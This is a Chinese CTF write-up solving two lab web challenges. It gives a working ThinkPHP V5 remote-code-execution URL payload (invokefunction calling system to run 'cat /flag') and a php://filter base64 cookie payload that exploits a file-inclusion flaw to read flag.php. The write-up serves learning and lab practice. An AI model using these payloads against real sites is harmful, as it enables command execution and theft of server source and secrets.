目录

php_rce

1、题目

2、知识点

3、思路

fileinclude

4、题目

5、知识点

6、思路

php_rce

1、题目

2、知识点

ThinkPHP V5的框架漏洞

3、思路

打开题目，出现了一个框架，之前做过类似的题目

NSSCTF-Web题目7(ThinkPHP V5 框架漏洞)-CSDN博客

可以直接百度这个框架的利用漏洞，可以参考上面的链接

利用poc如下：

url+?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统执行命令

61.147.171.105:62936/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

得到flag：flag{thinkphp5_rce}

fileinclude

4、题目

5、知识点

php伪协议

6、思路

这里存在flag.php页面，直接访问没有内容，很多可能需要用到php伪协议来读取，那没有参数可以上传怎么办？

右键查看源代码

发现了源代码

代码的意思：$lan变量等于上传的cookie值，如果cookie值不等于english，则执行include($lan.".php")，有include函数我们可以利用php的伪协议

php://filter使用

php://filter/read=convert.base64-encode/resource=[文件名]

payload：language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

使用hackbar上传cookie值

使用base64解密：

Base64 编码/解码 - 锤子在线工具 (toolhelper.cn)

得到flag：cyberpeace{e19623df5651cd42ede812cc2f0f3fd9}

这篇文章就先写到这里了，哪里不懂的或者哪里不足的欢迎指出